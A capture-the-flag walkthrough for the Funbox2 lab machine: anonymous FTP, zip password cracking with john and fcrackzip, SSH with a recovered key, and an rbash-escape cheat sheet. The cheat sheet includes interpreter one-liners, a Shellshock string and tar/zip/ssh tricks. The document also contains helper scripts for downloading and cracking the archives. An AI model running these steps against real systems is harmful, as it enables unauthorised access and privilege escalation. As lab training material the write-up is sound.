Vulnhub walkthrough: Funbox2-cookie
Information gathering
└─# cat nmapscan/info
# Nmap 7.93 scan initiated Sun Aug 13 21:13:54 2023 as: nmap -sT -sV -sC -O -p21,80,22 -o nmapscan/info 10.20.30.139
Nmap scan report for 10.20.30.139
Host is up (0.00057s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9467dfe0c4da97e2d77740fa2517251 (RSA)
| 256 15004667809b40123a0c6607db1d1847 (ECDSA)
|_ 256 75ba6695bb0f16de7e7ea17b273bb058 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:CB:50:B8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 13 21:14:03 2023 -- 1 IP address (1 host up) scanned in 9.10 seconds
Port 21 is open and the FTP service on it allows anonymous login.
Exploiting the services
FTP (port 21)
Anonymous login
└─# ftp 10.20.30.139
Connected to 10.20.30.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:10.20.30.139]
Name (10.20.30.139:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@10.20.30.129 !
230-
230-The local time is: Mon Aug 14 02:04:39 2023
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||24301|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp>
The FTP share holds a set of zip archives whose names look like usernames, so download all of them locally. Note that tom.zip is the only one that is not group-writable (-r--r--r--), a detail that sets it apart from the rest.
Cracking the zip passwords
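Instead of pulling the archives one `get` at a time, the following script (an added example, not part of the original walkthrough) lists the anonymous share with curl, filters the reply down to regular `.zip` files, and mirrors them with wget. It assumes curl and wget are installed and takes the host from `FTP_HOST`, defaulting to the lab address used above.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: mirror every .zip the anonymous
# FTP share exposes in one go rather than `get`-ting each file by hand.
# Assumptions: curl and wget are installed; FTP_HOST defaults to the lab address.

FTP_HOST="${FTP_HOST:-10.20.30.139}"

# Pull file names out of an `ls -l`-style LIST reply (read from stdin), keeping
# regular files that end in .zip. The name is the last of the nine fields; a
# leading 'd' in the mode string marks a directory, which is skipped.
zip_names_from_listing() {
    awk 'NF >= 9 && $1 !~ /^d/ && $NF ~ /\.zip$/ { print $NF }'
}

# Anonymous LIST of the root directory. ProFTPD accepts any string as the
# anonymous password; the scan already confirmed the login with FTP code 230.
ftp_list() {
    curl -s --user anonymous:anonymous "ftp://$FTP_HOST/"
}

# Fetch each archive into $1 (default: zip_dir). -nc skips files already
# downloaded, -nv keeps wget quiet but still reports failures.
fetch_zips() {
    mkdir -p "${1:-zip_dir}"
    ftp_list | zip_names_from_listing | while read -r name; do
        wget -nv -nc -P "${1:-zip_dir}" "ftp://anonymous:anonymous@$FTP_HOST/$name"
    done
}

# Usage: sh fetch_zips.sh --run [dest_dir]
if [ "${1:-}" = "--run" ]; then
    fetch_zips "${2:-zip_dir}"
fi
```

The listing filter is kept separate from the network calls so it can be checked against a saved `ls` reply; the loop then only ever downloads names the filter let through.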
1.zip2john
└─# unzip anna.zip
Archive: anna.zip
[anna.zip] id_rsa password:
skipping: id_rsa incorrect password
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─# unzip -l anna.zip
Archive: anna.zip
Length Date Time Name
--------- ---------- ----- ----
1675 2020-07-25 06:42 id_rsa
--------- -------
1675 1 file
└─\# ls
anna.zip ariel.zip bud.zip homer.zip john.zip miriam.zip tom.zip_hash zlatan.zip_hash
anna.zip.hash ariel.zip_hash cathrine.zip jessica.zip marge.zip tom zlatan.zip
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─# zip2john anna.zip > anna.zip_hash
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(root㉿kali)-[/home/kali/vulnhub/Funbox2/zip_dir]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt anna.zip_hash
Crack every zip collected this way; the id_rsa private key inside each archive can be used to log in over SSH.
Only tom.zip yields a password; none of the other archives cracks with this wordlist.
2.fcrackzip
└─\# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u tom.zip
PASSWORD FOUND!!!!: pw == iubire
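Running john once per archive, as above, repeats the whole wordlist pass eleven times. The script below (an added example, not from the original post) first reads the local file header of each zip to tell traditional ZipCrypto from WinZip AES, since fcrackzip only cracks the former, and then feeds every hash into a single john run. It assumes zip2john, john and fcrackzip are on PATH when the crack functions are called; the header check itself needs only od.

```shell
#!/bin/sh
# Added example, not from the original post: classify each archive's encryption,
# then crack all of them in one john run instead of one job per file.
# fcrackzip only understands the traditional ZipCrypto scheme; AES entries need
# zip2john + john. Assumes zip2john, john and fcrackzip are on PATH when run.

WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Classify the first entry of a zip from its local file header:
#   bytes 0-3  signature PK\3\4
#   bytes 6-7  general purpose flags; bit 0 = encrypted
#   bytes 8-9  compression method; 99 = WinZip AES (real method sits in the extra field)
# Prints none | zipcrypto | aes, or not-a-zip with a non-zero status.
zip_encryption_kind() {
    sig=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    if [ "$sig" != "504b0304" ]; then
        echo "not-a-zip"
        return 1
    fi
    # flag low byte, flag high byte, method low byte, method high byte
    set -- $(od -An -tu1 -j6 -N4 "$1")
    [ -n "${4:-}" ] || return 1
    method=$(( $3 + $4 * 256 ))
    if [ $(( $1 & 1 )) -eq 0 ]; then
        echo "none"
    elif [ "$method" -eq 99 ]; then
        echo "aes"
    else
        echo "zipcrypto"
    fi
}

# One hash file, one john run: every candidate password is tried against all the
# archives at once, so eleven files cost about the same as one.
crack_all() {
    : > all_zips.hash
    for f in *.zip; do
        kind=$(zip_encryption_kind "$f") || continue
        printf '%s: %s\n' "$f" "$kind"
        [ "$kind" = "none" ] && continue
        zip2john "$f" 2>/dev/null >> all_zips.hash
    done
    john --wordlist="$WORDLIST" all_zips.hash
    john --show all_zips.hash      # cracked passwords, one line per archive
}

# fcrackzip equivalent, ZipCrypto archives only. -u makes it verify each hit with
# unzip; without it the fast header check alone produces false positives.
fcrack_all() {
    for f in *.zip; do
        [ "$(zip_encryption_kind "$f")" = "zipcrypto" ] || continue
        fcrackzip -D -p "$WORDLIST" -u "$f"
    done
}

# Usage (inside zip_dir): sh crack_zips.sh --john   or   sh crack_zips.sh --fcrackzip
case "${1:-}" in
    --john) crack_all ;;
    --fcrackzip) fcrack_all ;;
esac
```

Whichever tool is used, a password that passes only the header check is a candidate, not a result: fcrackzip's -u and john's own verification both decrypt the entry fully before reporting it.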
SSH (port 22)
tom.zip unpacks to an id_rsa; use it to log in as tom:
└─\# ssh -i id_rsa tom@10.20.30.139
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Aug 14 02:12:34 UTC 2023
System load: 0.22 Processes: 161
Usage of /: 67.2% of 4.37GB Users logged in: 0
Memory usage: 44% IP address for ens33: 10.20.30.139
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
New release '20.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Aug 14 01:35:14 2023 from 10.20.30.129
tom@funbox2:~$
Privilege escalation
/bin/rbash
1. What is rbash
rbash is bash started in restricted mode (bash -r, or bash invoked under the name rbash). It behaves like a normal shell except that certain actions are refused: changing directory with cd, setting or unsetting PATH, SHELL, ENV and BASH_ENV, running commands whose names contain a slash, and redirecting output with >, >>, <>, >| and so on. In practice this means some commands simply cannot be run.
2. Setting up an rbash
cp /bin/bash /bin/rbash #copy bash under the name rbash (on Debian/Ubuntu /bin/rbash already exists)
useradd -s /bin/rbash test #make rbash the login shell of user test
mkdir -p /home/test/.bin #a directory in test's home holding the only commands that may be run (PATH is pointed at it from the profile)
Enumerating the Linux environment (information gathering for the escape)
1. Check which commands are available
e.g. cd, ls, su
2. Check which operators are allowed
> >> < | and so on
3. Commands that may be run as root
sudo -l
4. Check which shell you are in
echo $SHELL (and echo $0)
5. Check for available interpreters
python, php, perl, ruby
6. Check the environment variables
env / printenv
Common escape techniques
1. "/" is allowed in command names
If "/" is allowed, run the shell by full path: /bin/bash
2. cp is allowed
Copy /bin/bash (or /bin/sh) into a directory you can write to and run it; this still needs "/" to be allowed, because ./test1 contains one (or the directory must be on PATH).
cp /bin/bash test1
cp /bin/sh test2
./test1
./test2
3. Common applications
Check whether programs with a shell-escape feature are installed: ftp, gdb (the debugger), man, git, vi/vim, more/less and so on.
- ftp: run ftp, then at the ftp> prompt: !/bin/bash
- gdb: run gdb, then at the (gdb) prompt: !/bin/bash
- man: open any page, e.g. man man, then in the pager: !/bin/bash
- git: git help status opens the help page in the pager; then: !/bin/bash
- vi/vim:
vim test #open vi/vim
:!/bin/bash #run from command mode
- more/less:
more test
!/bin/bash #same trick: the pager lets you run a command while the file is open
4. set shell (as used on DC-2)
Some editors let you set the shell variable and then spawn it, e.g. in vim:
# inside vim/vi
:set shell=/bin/bash
:shell
#after switching, PATH still has to be fixed so commands can be found: append the standard directories
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
5. Changing the PATH or SHELL variables
Run: export -p #list the exported variables with their attributes
For PATH and SHELL the attributes will most likely read "-rx" (declare -rx): r means readonly, x means exported. rbash marks them readonly, so they cannot be reassigned; if a variable is not readonly (no r), you can simply set it, e.g. point SHELL or PATH at /bin/bash.
6. Programming languages
python
python -c "import pty;pty.spawn('/bin/bash')"
python -c "import os;os.system('/bin/bash')"
php
php -a #then at the interactive prompt: exec("/bin/bash -i");
perl
perl -e "exec '/bin/bash';"
lua
lua -e "os.execute('/bin/bash')"
ruby
ruby -e 'exec "/bin/bash"'
7. Other things to try
ssh (force a command instead of the login shell)
ssh username@IP -t "/bin/sh" or "/bin/bash"
ssh, variant 2 (skip the profile that sets up the restriction)
ssh username@IP -t "bash --noprofile"
ssh, variant 3 (Shellshock, if the target's bash is vulnerable)
ssh username@IP -t "() { :; }; /bin/bash"
ssh, variant 4 (SUID case: ProxyCommand runs a local script)
ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1
zip
zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
tar
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
awk
awk 'BEGIN {system("/bin/bash")}'
8. Another trick
Run the following commands in turn:
#define a new command through BASH_CMDS (bash's table of command paths) and run it
BASH_CMDS[a]=/bin/sh;a
#fix up PATH
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
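The enumeration checklist above, together with the readonly note in point 5, can be turned into a few functions. The script below is an added example, not part of the original post; it only reports whether the preconditions of the escapes listed above are met (writable PATH/SHELL, slashes in command names, interpreters and pagers on PATH, sudo rights) and does nothing else. The candidate binary list is taken from the techniques above; everything else is an assumption about a typical rbash setup.

```shell
#!/bin/sh
# Added example, not part of the original post: the enumeration checklist as
# functions you can paste into a restricted session. They only report which
# preconditions for the escapes are met; none of them escapes by itself.

# Can a variable be reassigned? rbash marks PATH, SHELL, ENV and BASH_ENV readonly,
# so a no-op reassignment in a subshell fails for them and succeeds for anything else.
var_is_writable() {
    ( eval "$1=\"\$$1\"" ) 2>/dev/null
}

# Are slashes allowed in command names? rbash refuses them ("restricted: cannot
# specify `/' in command names"), so a full-path command is a direct test.
slash_allowed() {
    ( /bin/true ) 2>/dev/null
}

# Which of the escape-capable programs from the list above are reachable, looking
# in the colon-separated directories given as $1 (default: the current PATH).
# The inner loop runs in a subshell so the IFS change does not leak out.
find_escape_bins() {
    dirs=${1:-$PATH}
    found=""
    for name in bash sh python python3 php perl ruby lua vi vim more less man ftp gdb git awk zip tar ssh cp; do
        if ( IFS=:; for d in $dirs; do [ -x "$d/$name" ] && exit 0; done; exit 1 ); then
            found="$found$name "
        fi
    done
    printf '%s\n' "$found"
}

# Print the whole checklist in one go. sudo -n never prompts, so it cannot hang.
restricted_shell_report() {
    printf 'SHELL=%s  invoked as %s\n' "${SHELL:-unset}" "$0"
    printf 'PATH writable:  %s\n'  "$(var_is_writable PATH  && echo yes || echo no)"
    printf 'SHELL writable: %s\n'  "$(var_is_writable SHELL && echo yes || echo no)"
    printf 'slash in command names allowed: %s\n' "$(slash_allowed && echo yes || echo no)"
    printf 'escape-capable programs on PATH: %s\n' "$(find_escape_bins)"
    printf 'sudo -l (non-interactive):\n'
    sudo -n -l 2>/dev/null || echo '  password required, or no sudo'
}

# Usage: paste the functions into the restricted shell and call restricted_shell_report,
# or source the file with --report.
if [ "${1:-}" = "--report" ]; then
    restricted_shell_report
fi
```

Each "yes" maps to one of the numbered techniques above: a writable SHELL or PATH is technique 5, an allowed slash is technique 1, and every program found is a candidate for techniques 3 and 6.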
Using sudo
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tom may run the following commands on funbox2:
(ALL : ALL) ALL
tom@funbox2:~$
(ALL : ALL) ALL means tom may run any command as any user, so a root shell is one sudo away:
tom@funbox2:~$ sudo /bin/bash
root@funbox2:~# whoami
root
root@funbox2:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:cb:50:b8 brd ff:ff:ff:ff:ff:ff
inet 10.20.30.139/24 brd 10.20.30.255 scope global dynamic ens33
valid_lft 1214sec preferred_lft 1214sec
inet6 fe80::20c:29ff:fecb:50b8/64 scope link
valid_lft forever preferred_lft forever
root@funbox2:~# cat /root/flag.txt
____ __ __ _ __ ___ ____ _ __ ___
/ __/ / / / / / |/ / / _ ) / __ \ | |/_/ |_ |
/ _/ / /_/ / / / / _ |/ /_/ / _> < / __/
/_/ \____/ /_/|_/ /____/ \____/ /_/|_| __ /____/
____ ___ ___ / /_ ___ ___/ / / /
_ _ _ / __// _ \/ _ \/ __// -_)/ _ / /_/
(_)(_)(_)/_/ \___/\___/\__/ \__/ \_,_/ (_)
from @0815R2d2 with ♥
root@funbox2:~#
Summary
Ubuntu 18 single-user mode (useful for resetting the lab VM): in the GRUB editor, end the kernel line with
rw single init=/bin/bash
Changing the NIC configuration:
cd /etc/netplan
vi *.yml #edit the netplan config in that directory
netplan apply
/etc/init.d/networking restart
ifup ens33
ifdown ens33